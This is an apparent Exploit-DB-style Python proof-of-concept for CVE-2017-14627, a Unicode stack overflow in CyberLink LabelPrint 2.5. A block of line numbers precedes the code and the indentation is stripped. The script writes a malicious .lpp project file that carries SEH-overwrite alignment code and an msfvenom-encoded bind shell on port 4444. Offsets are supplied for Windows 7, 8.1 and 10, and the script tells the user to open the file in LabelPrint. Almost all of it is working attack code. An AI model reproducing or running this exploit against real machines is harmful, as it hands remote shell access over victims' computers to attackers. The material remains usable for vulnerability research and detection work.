1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154 | #!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.
def exp():
header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
"\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
"\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
"\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
"\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
"\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
"\x30\x31\x37\x22\x3e")
filename2 = "labelprint_poc_universal.lpp"
f = open(filename2,'w')
junk = "A" * 790
nseh = "\x61\x42"
seh = "\x2c\x44"
nop = "\x42"
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
#preparing address for decoding
ven = nop #nop/inc edx
ven += "\x54" #push esp
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += "\x05\x1B\x01" #add eax 01001B00 universal
ven += nop #nop/inc edx
ven += "\x2d\x01\x01" #sub eax 01001000
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += nop #nop/inc edx
ven += "\x5c" #pop esp
#we need to encode the RET address, since C3 is bad char.
#preparing ret opcode
ven += nop #nop/inc edx
ven += "\x25\x7e\x7e" #and eax,7e007e00
ven += nop #nop/inc edx
ven += "\x25\x01\x01" #and eax,01000100
ven += nop #nop/inc edx
ven += "\x35\x7f\x7f" #xor eax,7f007f00
ven += nop #nop/inc edx
ven += "\x05\x44\x44" #add eax,44004400
ven += nop #nop/inc edx
ven += "\x57" #push edi
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += junk2 #depending OS
#custom venetian
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += align #depending OS
ven += nop #nop/inc edx
ven += "\x2d\x01\x01" #add eax, 01000100 #align eax to our buffer
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += nop #nop/inc edx
#call esp 0x7c32537b MFC71U.dll
ven += "\x5C" #pop esp
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += "\x05\x53\x7c" #add eax 7c005300 part of call esp
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += junk1 #depending OS
ven += "\x7b\x32" #part of call esp
#preparing for shellcode
ven += nop * 114 #junk
ven += "\x57" #push edi
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += align2 #depending OS
ven += nop #nop/inc edx
ven += "\x2d\x01\x01" #sub eax,01000100
ven += nop #nop/inc edx
ven += buf #shellcode
sisa = nop * (15000-len(junk+nseh+seh+ven))
payload = junk+nseh+seh+ven+sisa
bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"
bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
"\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
f.write(header+ "\n" + bug)
print "[+] File", filename2, "successfully created!"
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
print "[*] Good luck ;)"
f.close()
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <------------------------------------------------->\n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
input = input("Choose Target OS : ")
try:
if input == 1:
align = "\x05\x09\x01" #add eax,01000400
align2 = "\x05\x0A\x01" #add eax, 01000900
junk1 = '\x42' * 68 #junk for win7x86
junk2 = '\x42' * 893 #junk for win7x86
exp()
elif input == 2:
align = "\x05\x09\x01" #add eax,01000400
align2 = "\x05\x0A\x01" #add eax, 01000900
junk1 = '\x42' * 116 #junk for win8.1x64
junk2 = '\x42' * 845 #junk for win8.1x64
exp()
elif input == 3:
align = "\x05\x05\x01" #add eax,01000400
align2 = "\x05\x06\x01" #add eax, 01000900
junk1 = '\x42' * 136 #junk for win10x64
junk2 = '\x42' * 313 #junk for win10x64
exp()
else:
print "Choose the right one :)"
except:
print ""
|